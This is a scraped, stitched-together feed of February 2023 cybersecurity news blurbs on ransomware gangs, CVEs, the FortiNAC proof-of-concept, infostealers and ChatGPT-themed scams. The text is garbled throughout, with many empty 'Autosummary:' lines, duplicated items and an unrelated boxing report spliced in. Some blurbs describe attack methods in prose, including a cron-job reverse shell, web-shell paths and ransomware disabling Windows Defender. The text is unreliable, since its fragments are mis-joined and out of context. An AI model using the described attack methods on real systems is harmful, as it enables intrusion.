In the hours following the CNN article, Dole issued a statement to the press, confirming that it had fallen foul of ransomware: Upon learning of this incident, Dole moved quickly to contain the threat and engaged leading third-party cybersecurity experts, who have been working in partnership with Dole"s internal teams to remediate the issue and secure systems. "The massive popularity of OpenAI’s chatbot ChatGPT has not gone unnoticed by cyber criminals: they are exploiting the public’s eagerness to experiment with it to trick users into downloading Windows and Android malware and visit phishing pages. Fake ChatGPT apps for Windows and Android Cyble’s researchers have spotted: A Facebook page misusing the ChatGPT name and logo to direct the audience to pages mimicking the ChatGPT website and offering a (non-existent) ChatGPT app for Windows … More
The post Users looking for ChatGPT apps get malware instead appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Anti-Activity Monitor script (Jamf) Ventura and the road ahead The latest version of macOS, codenamed “Ventura,” introduces more stringent code-signing checks that threaten to make hiding and launching malware from inside user-launched apps, especially pirated ones, ineffective. "Threat actors are actively exploiting the Fortinet FortiNAC vulnerability CVE-2022-39952 a few hours after the publication of the PoC exploit code. This week, researchers at Horizon3 cybersecurity firm have released a proof-of-concept exploit for a critical-severity vulnerability, tracked as CVE-2022-39952, in Fortinet’s FortiNAC network access control solution. Last week, Fortinet has released security updates to address two […]
The post Fortinet FortiNAC CVE-2022-39952 flaw exploited in the wild hours after the release of PoC exploit appeared first on Security Affairs.
"Autosummary:
The installation paths we have seen are: ▪ bsc/campusMgr/ui/ROOT/fortii.jsp ▪ bsc/campusMgr/ui/ROOT/shell.jsphttps://t.co/I8hnaVNS9Z pic.twitter.com/IlJbgtzMTA — Germán Fernández (@1ZRR4H) February 23, 2023 Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Fortinet) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: News The LockBit gang has released a chat history showing its negotiations with Royal Mail. |
The post Royal Mail schools LockBit in leaked negotiation appeared first on Malwarebytes Labs.
"Autosummary:
A good way to lower the temperature is to adopt the ransomware gang’s self-serving vernacular, he says, and the Royal Mail’s “IT guy” does this in subtle ways, such as referring to LockBit’s criminal activity as “penetration testing.”Legal obligations must be met, law enforcement involved, cyberinsurance rules followed, customers and suppliers informed, and so on. The negotiation began on January 12, 2023, and like any Internet chat, the conversation takes place between two avatars who may or may not be who they say they are.They consistently used language like “I am trying to help our Senior Team understand this,” “I am still trying to work with you here,” “I am doing what I can to drive things forward.” Maybe they did work in IT, but having spent years working in IT myself, and after seeing how the Royal Mail’s representative conducted themselves, I will simply say they aren’t like anyone I ever met. "Categories: News Categories: Ransomware Tags: Lehigh Valley Health Network Tags: LVHN Tags: BlackCat Tags: ALPHV Tags: Noberus Tags: ransomware Tags: leak site Tags: DDoS The Lehigh Valley Health Network stated it was the target of a cybersecurity attack by a ransomware gang known as BlackCat |
The post BlackCat ransomware targets another healthcare facility appeared first on Malwarebytes Labs.
"Autosummary:
Posted: February 23, 2023 by The Lehigh Valley Health Network stated it was the target of a cybersecurity attack by a ransomware gang known as BlackCat In a statement issued Monday morning, Lehigh Valley Health Network said it had been the target of a cyberattack attributed to a ransomware gang known as BlackCat. BlackCat The ransomware-as-a-service (RaaS) group BlackCat, also known as ALPHV and Noberus, is currently one of the most active groups, and has been associated with Russia. In December, 2022, the Office of Information Security and Health Sector Cybersecurity Coordination Center issued an extensive Analyst Note which identified BlackCat as a "relatively new but highly-capable" ransomware threat to health care providers. "Categories: Android Categories: News Tags: Samsung Tags: message guard Tags: sandbox Tags: zero-click exploit Tags: images Tags: attachments Samsung has announced the introduction of Message Guard protection against zero-click exploits for the Samsung Galaxy S23 series. |
The post Samsung adds Message Guard protection against zero-click exploits appeared first on Malwarebytes Labs.
"Autosummary:
Samsung Message Guard covers the following image formats: PNG, JPG/JPEG, GIF, ICO, WEBP, BMP, and WBMP. Zero-click Zero-click malware is defined as malware that does not require any user action or input to infect a device or system. "Autosummary:
"Researchers identified 56 new vulnerabilities associated with ransomware threats among a total of 344 threats identified in 2022 – marking a 19% increase year-over-year. Threat actors are actively searching the internet and deep and dark web for 180 vulnerabilities known to be associated with ransomware. In the last quarter of 2022, these groups used ransomware to exploit 21 of these vulnerabilities, according to a new report from Cyber Security Works (CSW), Ivanti, Cyware, and Securin. … More
The post Most vulnerabilities associated with ransomware are old appeared first on Help Net Security.
"Autosummary:
In the last quarter of 2022, these groups used ransomware to exploit 21 of these vulnerabilities, according to a new report from Cyber Security Works (CSW), Ivanti, Cyware, and Securin. "Resecurity warns about the increase of malicious cyber activity targeting data center service providers globally. According to the detailed report recently released by the California-based cybersecurity company, during September 2021, Resecurity notified several data center organizations about malicious cyber activity targeting them and their customers. Such organizations act as a critical part of the enterprise supply chain and become a juicy target for nation-state, criminal and cyberespionage groups. The details about this activity have been … More
The post Resecurity warns about cyber-attacks on data center service providers appeared first on Help Net Security.
"Autosummary:
Most organizations identified in the leaked data sets relate to financial institutions (FIs) with a global presence, investment funds, biomedical research companies, technology vendors, e-commerce, online marketplaces, cloud services, ISPs and CDN providers with HQ in the U.S, the U.K, Canada, Australia, New Zealand, Singapore and China. Once the customer credentials were collected, the actor performed active probing to the customer panels aiming to collect information about the representatives of enterprise customers who manage operations at the data center, list of purchased services, and deployed equipment. "Autosummary:
"Autosummary:
"In this Help Net Security video, J.R. Cunningham, CSO at Nuspire, discusses IoT cybersecurity concerns for 2023. With homes becoming increasingly connected and reliant on smart technology, the potential for cybercriminals to exploit vulnerabilities and wreak havoc is higher than ever before. Although we have new and emerging standards for how connected things talk to each other, such as the Matter standard that IoT companies have agreed to adopt, this could be the year we … More
The post Are your IoT devices at risk? Cybersecurity concerns for 2023 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"VMware released security updates to address a critical vulnerability, tracked as CVE-2023-20858, in the Carbon Black App Control product. VMware addressed a critical injection vulnerability, tracked as (CVSSv3 score 9.1), Carbon Black App Control. VMware Carbon Black App Control allows organizations to ensure that only trusted and approved software is allowed to execute on their critical […]
The post VMware addressed a critical bug in Carbon Black App Control appeared first on Security Affairs.
"Autosummary:
"Autosummary:
The cybercriminals behind HardBit even attempt to quash any pangs of guilt an IT administrator or CISO might be having about sharing details of their insurance: "Poor multimillionaire insurers will not starve and will not become poorer from the payment of the maximum amount specified in the contract, because everyone knows that the contract is more expensive than money, so let them fulfill the conditions prescribed in your insurance contract, thanks to our interaction," the ransom note concludes.For example your company is insured for 10 million dollars, while negotiating with your insurance agent about the ransom he will offer us the lowest possible amount, for example 100 thousand dollars, we will refuse the paltry amount and ask for example the amount of 15 million dollars, the insurance agent will never offer us the top threshold of your insurance of 10 million dollars. "Autosummary:
"US CISA added actively exploited flaws in IBM Aspera Faspex and Mitel MiVoice to its Known Exploited Vulnerabilities Catalog. US CISA added the following actively exploited flaws to its Known Exploited Vulnerabilities Catalog: CVE-2022-47986 (CVSS score: 9.8) – IBM Aspera Faspex Code Execution Vulnerability – A remote attacker can trigger the vulnerability to execute arbitrary code on […]
The post CISA adds IBM Aspera Faspex and Mitel MiVoice to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Unlike S1deload Stealer, the Stealc malware is distributed via fake cracked software, a highly popular tactic also used to push other info stealers like Vidar, Redline, Raccoon, and Mars. "Tech giant Apple discloses three new vulnerabilities affecting its iOS, iPadOS, and macOS operating systems. Apple updated its advisories by adding three new vulnerabilities, tracked as CVE-2023-23520, CVE-2023-23530 and CVE-2023-23531, that affect iOS, iPadOS, and macOS. An attacker can trigger the CVE-2023-23530 flaw to execute arbitrary code out of its sandbox or with certain elevated privileges. The vulnerability resides in the Foundation […]
The post Experts found a large new class of bugs ‘class’ in Apple devices appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Apple) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Two examples highlighted in the report are "chatGPT1," which is an SMS billing fraud app, and "AI Photo," which contains the Spynote malware, which can steal call logs, contact lists, SMS, and files from the device. "Autosummary:
The biggest payout was for a report detailing an exploit chain of five bugs (CVE-2022-20427, CVE-2022-20428, CVE-2022-20454, CVE-2022-20459, CVE-2022-20460) in Android submitted by gzobqq, which was rewarded with $605,000. "Autosummary:
"Autosummary:
"NetSPI has appointed Scott Lundgren and John Spiliotis to its Board of Directors. The two veteran security industry executives will support the company’s next stage of growth following a year of record momentum. “We’re honored to have Scott and John join our Board during such an exciting, pivotal time for NetSPI,” said Aaron Shilts, CEO of NetSPI. “Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the … More
The post Scott Lundgren and John Spiliotis join NetSPI Board of Directors appeared first on Help Net Security.
"Autosummary:
“Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the next generation of business leaders, will be invaluable as we continue to innovate and scale,” Shilts added. "It’s never been easier to write a convincing message that can trick you into handing over your money or personal data
The post Writing like a boss with ChatGPT and how to get better at spotting phishing scams appeared first on WeLiveSecurity
"Autosummary:
It may, for example, be your bank asking to confirm personal and financial details via email or text, which an actual bank will never do.These developments might put the ability to launch large-scale, persuasive, error-free and even targeted cyberattacks and scams such as business email compromise (BEC) fraud into the hands of far more people than ever before.Needless to say, the victim never receives their iPhone, gift card, money or any other item they were promised.Avoid clicking on links, downloading files or opening attachments in messages even if they appear to be from a known, trusted source – unless you have verified with the sender via other channels that the message is authentic. "Autosummary:
"Understanding why ChatGPT is garnering so much attention takes a bit of background. Up until recently, AI models have been quite “dumb”: they could only respond to specific tasks when trained on a large dataset providing context on what to find. But, over the last five years, research breakthroughs have taken AI to a whole new level, enabling computers to better understand the meaning behind words and phrases. Leveraging these mechanics and 5 large language … More
The post ChatGPT is bringing advancements and challenges for cybersecurity appeared first on Help Net Security.
"Autosummary:
In theory, ChatGPT and similar AI models should help close the cybersecurity talent shortage by making individual security professionals significantly more effective – so much so, in fact, that with AI, one person will be able to accomplish the same output as multiple individuals before. Ready or not, here it comes Whether we like it or not, ChatGPT and next-generation AI models are here to stay, which presents us with a choice: we can be afraid of the change and what’s to come, or we can adapt to it and ensure we embrace it holistically by implementing both an offensive and defensive strategy. "Autosummary:
"Cryptocurrency exchange Coinbase has fended off a cyberattack that might have been mounted by the same attackers that targeted Twillio, Cloudflare and many other companies last year. Leveraging smishing and vishing, the attackers tried to trick Coinbase employees into sharing login credentials and installing remote desktop applications, and were only partly successful: the company’s incident response team quickly reacted to “unusual activity” alerts and, in the end, the attackers were unable to access customer information … More
The post What can we learn from the latest Coinbase cyberattack? appeared first on Help Net Security.
"Autosummary:
Attempted access to company assets from a third party VPN provider Phone calls or text messages from services like Google Voice, Skype, Vonage (formerly Nexmo), etc. “As a network defender you should expect to see login attempts to corporate applications from VPN services (e.g. Mullvad), using stolen credentials, cookies, or other session tokens. "Autosummary:
The truth is ML-powered security solutions are bringing about a significant transformation in network security by providing security teams with numerous benefits and enhancing the overall threat detection capabilities of organizations: Big data analytics :With the ever-increasing amount of data and different log sources, organisations must be able to process vast amounts of information in real-time, including network traffic logs, endpoints, and other sources of information related to cyber threats. The Role of ML-Driven Network Security Solutions ML-driven network security solutions in cybersecurity refer to the use of self-learning algorithms and other predictive technologies (statistics, time analysis, correlations etc.) to automate various aspects of threat detection. :With the ever-increasing amount of data and different log sources, organisations must be able to process vast amounts of information in real-time, including network traffic logs, endpoints, and other sources of information related to cyber threats. "Autosummary:
" The incident, which took place on February 5, 2023, resulted in the exposure of a "limited amount of data" from its directory, including employee names, e-mail addresses, and some phone numbers. "Resecurity warns about the increase of malicious cyber activity targeting data center service providers globally. According to the detailed report recently released by the California-based cybersecurity company, during September 2021, Resecurity notified several data center organizations about malicious cyber activity targeting them and their customers. Such organizations act as a critical part of the enterprise […]
The post Resecurity warns about cyber-attacks on data center service providers appeared first on Security Affairs.
"Autosummary:
Most organizations identified in the leaked data sets relate to financial institutions (FIs) with a global presence, investment funds, biomedical research companies, technology vendors, e-commerce, online marketplaces, cloud services, ISPs and CDN providers with HQ in the U.S, the U.K, Canada, Australia, New Zealand, Singapore and China. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, data center service providers) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
In the incident of the Royal Mail ransomware, the LockBit hacker set a ransom of $80m, which they claimed was equal 0.5% of the company’s revenue, in exchange for decrypting the files. Changing Tactics in Ransomware Attacks Ransomware is malicious software that encrypts a company’s data, preventing access to data until the ransom payment is paid and a decryptor is released. "Horizon3.ai’s Attack Team has released a PoC exploit for CVE-2022-39952, a critical vulnerability affecting FortiNAC, Fortinet’s network access control solution. “Similar to the weaponization of previous archive vulnerability issues that allow arbitrary file write, we use this vulnerability to write a cron job to /etc/cron.d/payload. This cron job gets triggered every minute and initiates a reverse shell to the attacker,” shared Zach Hanley, Chief Attack Engineer at Horizon3.ai. “We first create a zip that contains … More
The post PoC exploit, IoCs for Fortinet FortiNAC RCE released (CVE-2022-39952) appeared first on Help Net Security.
"Autosummary:
"Recently emerged HardBit ransomware gang adjusts their demands so the insurance company would cover the ransom cost. The HardBit ransomware group first appeared on the threat landscape in October 2022, but unlike other ransomware operations, it doesn’t use a double extortion model at this time. The gang threatens victims of further attacks if their ransom […]
The post HardBit ransomware gang adjusts their demands so the insurance company would cover the ransom cost appeared first on Security Affairs.
"Autosummary:
To prevent Windows Defender Antivirus from blocking the ransomware process, it makes several Windows Registry changes to disable many Windows Defender features (i.e. tamper protection, anti-spyware capabilities, real-time behavioral monitoring, real-time on-access (file) protection, and real-time process scanning). Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, HardBit ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Comparison between vulnerable and patched versions (Horizon3) The bash script executes the "unzip" command on the newly written file, but just before that, the script calls "cd /." The executed bash script (Horizon3) "Unzip will allow placing files in any paths as long as they do not traverse above the current working directory," Horizon3 explains. "Autosummary:
"Researchers released a proof-of-concept exploit code for the critical CVE-2022-39952 vulnerability in the Fortinet FortiNAC network access control solution. Researchers at Horizon3 cybersecurity firm have released a proof-of-concept exploit for a critical-severity vulnerability, tracked as CVE-2022-39952, in Fortinet’s FortiNAC network access control solution. Last week, Fortinet has released security updates to address two critical vulnerabilities in FortiNAC […]
The post PoC exploit code for critical Fortinet FortiNAC bug released online appeared first on Security Affairs.
"Autosummary:
The affected products are: FortiNAC version 9.4.0 FortiNAC version 9.2.0 through 9.2.5 FortiNAC version 9.1.0 through 9.1.7 FortiNAC 8.8 all versions FortiNAC 8.7 all versions FortiNAC 8.6 all versions FortiNAC 8.5 all versions FortiNAC 8.3 all versions The CVE-2022-39952 vulnerability is fixed in FortiNAC 9.4.1 and later, 9.2.6 and later, 9.1.8 and later, and 7.2.0 and later. "Categories: News Tags: hardbit Tags: ransomware Tags: infection Tags: insurance Tags: cyber Tags: negotiation Tags: encrypted Tags: locked Tags: network We take a look at a ransomware infection which uses a novel approach to payments: asking for the victim"s insurance details. |
The post HardBit ransomware tailors ransom to fit your cyber insurance payout appeared first on Malwarebytes Labs.
"Autosummary:
Although there is no specific information as to how it arrives on a network, once it gets there is performs typical ransomware operations: Encrypts files, branding them with the file’s custom logo Gathers system/network data Reduces overall security of affected systems Disables recovery options and tamper protection, turns off multiple Windows Defender features, and interferes with several other security features including real time monitoring and Windows services related to backups like the Volume Shadow Copy Service.If the scammers are told in private what the insurance total is, they’ll be able to ensure their demand for money is A) at the top end limit of the ransom payout scale provided and B) does not go past this limit, so the affected company receives every cent they"ve paid out. HardBit 2.0: dismantling a device piece by piece The ransomware, called HardBit 2.0, has been in circulation since sometime around November last year. "The number of data breaches affecting healthcare providers declined in the second half of 2022, consistent with a downward trend over the past two years, according to Critical Insight. Healthcare industry sees a decrease in data breaches A deeper dive into the data reveals that current breach totals are still higher than pre-pandemic levels; breaches are affecting more individuals; and hackers are shifting tactics to attack weak links in the healthcare system supply chain, most … More
The post Healthcare data breaches still higher than pre-pandemic levels appeared first on Help Net Security.
"Autosummary:
Healthcare organizations must stay vigilant to protect patient data Breach numbers are down: Total breaches dropped 9% between the first six months of 2022 and the year’s second half, declining since a high-water mark at the height of the pandemic from 393 breaches in the second half of 2020 to 313 in the latest reporting period. "Scientists have taken a key step toward harnessing a form of artificial intelligence known as deep reinforcement learning, or DRL, to protect computer networks. Autonomus cyber defense framework When faced with sophisticated cyberattacks in a rigorous simulation setting, deep reinforcement learning was effective at stopping adversaries from reaching their goals up to 95 percent of the time. The outcome offers promise for a role for autonomous AI in proactive cyber defense. Scientists from the Department … More
The post Cybersecurity takes a leap forward with AI tools and techniques appeared first on Help Net Security.
"Autosummary:
DRL: Decisions in a broad attack space “An effective AI agent for cybersecurity needs to sense, perceive, act and adapt, based on the information it can gather and on the results of decisions that it enacts,” said Samrat Chatterjee, a data scientist who presented the team’s work. The stages of the attack included tactics of reconnaissance, execution, persistence, defense evasion, command and control, collection and exfiltration (when data is transferred out of the system). “Our goal is to create an autonomous defense agent that can learn the most likely next step of an adversary, plan for it, and then respond in the best way to protect the system,” Chatterjee said. "Autosummary:
"The LockBit ransomware gang claims to have hacked Aguas do Porto, a Portuguese municipal water utility company. The LockBit ransomware gang claims to have hacked Aguas do Porto, a Portuguese municipal water utility company, and is threatening to leak the stolen data. Aguas do Porto is a municipal water utility company that manages the full […]
The post Lockbit ransomware gang hit the Portuguese municipal water utility Aguas do Porto appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Aguas do Porto) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
Any downloads or attempted downloads of specific remote desktop viewers, including AnyDesk (anydesk dot com) and ISL Online (islonline[.]com) Any attempts to access the organization from a third-party VPN provider, specifically Mullvad VPN Incoming phone calls/text messages from specific providers, including Google Voice, Skype, Vonage/Nexmo, and Bandwidth Any unexpected attempts to install specific browser extensions, including EditThisCookie Employees of companies that manage digital assets and have a strong online presence are bound to be targeted by social engineering actors at some point. "Autosummary:
Some of the key actors involved in the efforts include FROZENBARENTS (aka Sandworm or Voodoo Bear), FROZENLAKE (aka APT28 or Fancy Bear), COLDRIVER (aka Callisto Group), FROZENVISTA (aka DEV-0586 or UNC2589), and SUMMIT (aka Turla or Venomous Bear). "SANS Security Awareness, a division of the SANS Institute, launched its new short-form technical training modules, “Security Essentials for IT Administrators.” This series provides a comprehensive review of cybersecurity principles, specifically targeting those with a foundational understanding of IT systems and/or network administration to keep them up-to-date and knowledgeable in the constantly evolving cybersecurity landscape. Relevant training for this audience is essential in the overall security posture of an organization as more IT professionals, such … More
The post SANS Institute unveils new cybersecurity training for IT administrators appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The features that SEKOIA could verify by analyzing the captured sample are the following: Lightweight build of only 80KB Use of legitimate third-party DLLs Written in C and abusing Windows API functions Most strings are obfuscated with RC4 and base64 The malware exfiltrates stolen data automatically It targets 22 web browsers, 75 plugins, and 25 desktop wallets SEKOIA"s curent report does not include all the data obtained from reverse engineering Stealc but provides an overview of the main steps of its execution. "Autosummary:
"To avoid all this and get the money on the insurance, be sure to inform us anonymously about the availability and terms of the insurance coverage, it benefits both you and us, but it does not benefit the insurance company," HardBit operators say in a note to victims. "Categories: News Categories: Ransomware Tags: Applied materials Tags: MKS Tags: ransomware Tags: semiconductor Applied Materials has said it expects to miss $250 million in second-quarter sales due to a ransomware attack at a supplier. |
The post Chip company loses $250m after ransomware hits supply chain appeared first on Malwarebytes Labs.
"Autosummary:
Applied Materials, one of the world’s leading suppliers of equipment, services, and software for the manufacture of semiconductors, has warned that its second-quarter sales are likely to be hurt to the tune of $250 million due to a cybersecurity attack at one of its suppliers. "Categories: News Categories: Ransomware Tags: Clop Tags: Clop ransomware Tags: ransomware Tags: GoAnywhere Tags: managed file transfer Tags: MFT Tags: Fortra Tags: CISA Tags: Known Exploited Vulnerabilities Catalog The Clop ransomware gang has claimed responsibility for a wave of attacks that exploited a zero-day in GoAnywhere MFT admin consoles. |
The post GoAnywhere zero-day opened door to Clop ransomware appeared first on Malwarebytes Labs.
"Autosummary:
It recently filed a Form 8-K to the Securities and Exchange Commission (SEC), announcing the compromise of its system and disclosure of company data, including protected health information (PHI) and personal information (PI) of certain patients. The Cybersecurity & Infrastructure Security Agency (CISA) recently added CVE-2023-0669 to its Known Exploited Vulnerabilities Catalog, a list of software flaws that federal organizations must patch within two weeks. "AI-pocalypse soon? As stunning as ChatGPT’s output can be, should we also expect the chatbot to spit out sophisticated malware?
The post Will ChatGPT start writing killer malware? appeared first on WeLiveSecurity
"Autosummary:
A. We are not really close to “full AI-generated malware”, though ChatGPT is quite good at code suggestion, generating code examples and snippets, debugging, and optimizing code, and even automating documentation. This current robot hipster tech is a fancy autoresponder that is good enough to produce homework answers, research papers, legal responses, medical diagnoses, and a host of other things that have passed the “smell test” when treated as if they are the work of human actors. "Autosummary:
"Categories: News Tags: GoDaddy Tags: GoDaddy breach Hosting and domain name company GoDaddy says it believes a sophisticated threat actor group has been subjecting the company to a multi-year attack campaign. |
The post GoDaddy says it"s a victim of multi-year cyberattack campaign appeared first on Malwarebytes Labs.
"Autosummary:
" Make sure your hosting account is secure If you are using GoDaddy or other hosting services, now is a good time to review your credentials and ensure your account is as locked up as possible.Posted: February 20, 2023 by Hosting and domain name company GoDaddy says it believes a "sophisticated threat actor group" has been subjecting the company to a multi-year attack campaign. "Alteryx has unveiled new self-service and enterprise-grade capabilities to its Alteryx Analytics Cloud Platform to help customers make faster and more intelligent decisions. The enhanced platform, which now includes all access for Designer Cloud, offers an approachable easy-to-use drag-and-drop modern interface accessible to employees of all skill levels, without compromising data governance or security standards. “We are excited about the release of the Alteryx Designer product for the cloud and the ability to make analytics … More
The post Alteryx Analytics Cloud platform updates boost decision intelligence appeared first on Help Net Security.
"Autosummary:
With two-thirds of survey respondents indicating they would benefit from an easy and approachable cloud analytics interface, new Alteryx Analytics Cloud updates include: The reimagined Designer Cloud interface is now available in All Access, with more than 30 extended prep, blend, analysis, and automation tools for intelligent decision making. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Combining identity and security strategies to mitigate risks The Identity Defined Security Alliance (IDSA), a nonprofit that provides vendor-neutral resources to help organizations reduce the risk of a breach by combining identity and security strategies, announced Jeff Reich as the organization’s new Executive Director. Can we predict cyber attacks? Bfore.AI says they can In this Help Net Security interview, Luigi … More
The post Week in review: Microsoft, Apple patch exploited zero-days, tips for getting hired in cybersecurity appeared first on Help Net Security.
"Autosummary:
In this role, Bhagwat will lead the evolution, growth, and expansion of the Entrust Digital Security portfolio, which includes solutions for data encryption, public and private certificate authorities, identity and access management, digital signing, and security policy management. New infosec products of the week: February 17, 2023 Here’s a look at the most interesting products from the past week, featuring releases from CyberSaint, DigiCert, Finite State, FireMon, and Veeam Software. "Experts spotted a malware dubbed Frebniis that abuses a Microsoft IIS feature to deploy a backdoor and monitor all HTTP traffic to the system. Broadcom Symantec researchers have spotted a new malware, tracked as Frebniis, that abuses Microsoft Internet Information Services (IIS) to deploy a backdoor and monitor all HTTP traffic to the infected system, […]
The post Frebniis malware abuses Microsoft IIS feature to create a backdoor appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Frebniis) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"I thought Leigh was cruising that fight, won four rounds on the spin, but Mauricio Lara came with a left hook from the heavens." Heartbreak for Wood in thriller The loss is Wood"s third in a 29-fight career A fight widely expected to be a shootout between arguably two of the biggest punchers of the division did not disappoint. Victory for Mexican Lara brought his maiden world title Wood seeks rematch as Lara & Warrington clash ringside With so much emphasis nowadays put on protecting an unbeaten record, Wood has bounced back from defeats before and should be applauded for taking on a feared puncher in Lara as a voluntary defence, when easier options were available. "Autosummary:
"GoDaddy discloses a security breach, threat actors have stolen source code and installed malware on its servers in a long-runing attack. Web hosting company GoDaddy announced that attackers have stolen source code and installed malware on its servers. The threat actors have breached its cPanel shared hosting environment, the company states that it is not […]
The post GoDaddy discloses a new data breach appeared first on Security Affairs.
"Autosummary:
“Advances in computer capabilities, discoveries of new weaknesses, increased likelihood of nation-state cyber attacks (including retaliatory cyber attacks by Russia in response to economic sanctions resulting from the Russia-Ukraine military conflict), and other developments with software generally used by the Internet community, such as the Meltdown and Spectre vulnerabilities, which exploit security flaws in chips manufactured in the last 20 years, the Shellshock vulnerability in the Linux Bash shell, the Log4Shell vulnerability in the widely used logging library Log4j, continually evolving ransomware attacks, or developments related to vendor software (e.g., SolarWinds Orion product incident), also increase the risk that we, or our customers using our servers and services, will suffer a security breach.” concludes the company. "Autosummary:
WhiskerSpy details WhiskerSpy is the main payload used in the latest ‘Earth Kitsune’ campaign, giving remote operators the following capabilities: interactive shell download file upload file delete file list files take screenshot load executable and call its export inject shellcode into a process The backdoor communicates with the command and control (C2) server using a 16-byte AES key for encryption. "Cyber-physical system vulnerabilities disclosed in the second half (2H) of 2022 have declined by 14% since hitting a peak during 2H 2021, while vulnerabilities found by internal research and product security teams have increased by 80% over the same time period, according to Claroty. Strengthening cyber-physical systems These findings indicate that security researchers are having a positive impact on strengthening the security of the Extended Internet of Things (XIoT), a vast network of cyber-physical systems … More
The post XIoT vendors get serious about security, devote resources to protect cyber-physical systems appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Cisco separately also resolved a denial-of-service (DoS) vulnerability impacting Cisco Nexus Dashboard (CVE-2023-20014, CVSS score: 7.5) and two other privilege escalation and command injection flaws in Email Security Appliance (ESA) and Secure Email and Web Manager (CVE-2023-20009 and CVE-2023-20075, CVSS scores: 6.5). "US CISA added actively exploited flaws in Cacti framework, Microsoft Office, Windows, and iOS to its Known Exploited Vulnerabilities Catalog. US CISA added the following actively exploited flaws to its Known Exploited Vulnerabilities Catalog: CVE-2022-46169 – Cacti is an open-source platform that provides a robust and extensible operational monitoring and fault management framework for users. The flaw […]
The post CISA adds Cacti, Office, Windows and iOS bugs to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Known Exploited Vulnerabilities Catalog) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Cisco addressed a critical vulnerability in the ClamAV open source antivirus engine that can lead to remote code execution on vulnerable devices. Cisco fixed a critical flaw, tracked as CVE-2023-20032 (CVSS score: 9.8), in the ClamAV open source antivirus engine. The vulnerability resides in the residing in the HFS+ file parser component, an attacker can trigger […]
The post Cisco fixed critical RCE bug in ClamAV Open-Source Antivirus engine appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ClamAV) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Microsoft"s February Patch Tuesday update deals with 76 vulnerabilities that affect Windows, Exchange, Office, and Microsoft development tools — and three Windows vulnerabilities (CVE-2023-21823, CVE-2023-21715 and CVE-2023-23376) have been reported as exploited in the wild and require immediate attention.
Autosummary:
With Windows 10 21H2 now out of mainstream support, the following Microsoft applications will reach end of mainstream support or servicing in 2023: Visio Services in SharePoint (in Microsoft 365) — Feb. 10, 2023 (retired); Microsoft Endpoint Configuration Manager, Version 2107 — Feb 2, 2023 (end of service). Given the large number of changes included this month, I have broken down the testing scenarios into high-risk and standard-risk groups: High Risk As all the high-risk changes affect the Windows printing subsystem again this month, we have not seen any published functionality changes.Microsoft"s February Patch Tuesday update deals with 76 vulnerabilities that affect Windows, Exchange, Office, and Microsoft development tools — and three Windows vulnerabilities (CVE-2023-21823, CVE-2023-21715 and CVE-2023-23376) have been reported as exploited in the wild and require immediate attention.Microsoft has released four patches to Microsoft Exchange Server (CVE-2023-21706, CVE-2023-21707, CVE-2023-21529, CVE-2023-21710) all of which are rated important. Microsoft development platforms Microsoft released three critical updates affecting Visual Studio and .NET (CVE-2023-21808, CVE-2023-21815 and CVE-2023-23381) that could lead to arbitrary code execution. Browsers Microsoft released three updates to its (Chromium) Edge browser: CVE-2023-21794, CVE-2023-23374 and CVE-2023-21720 . "Autosummary:
"Autosummary:
If not, it"s time to do so, as the tech giant just released security updates for iOS, iPadOS, macOS, and Safari. So keep those firewalls up, keep those updates coming, and let"s continue to stay curious, stay vigilant, and stay safe in the ever-changing digital landscape.Most of these compromised hosts are located in France, Germany, the Netherlands, the U.K., and Ukraine. Ransomware attacks like ESXiArgs can be devastating for organizations, causing data loss, financial losses, and reputational damage. "Autosummary:
"Categories: News Tags: mortal kombat Tags: ransomware Tags: laplas clipper Tags: cryptocurrency Tags: encrypt Tags: network Tags: infect Tags: ransom Tags: demand Tags: BAT file Tags: email Tags: phish Tags: phishing Tags: attachment It’s like a choose your own adventure game gone horribly wrong. |
The post Mortal Kombat ransomware forms tag team with crypto-stealing malware appeared first on Malwarebytes Labs.
"Autosummary:
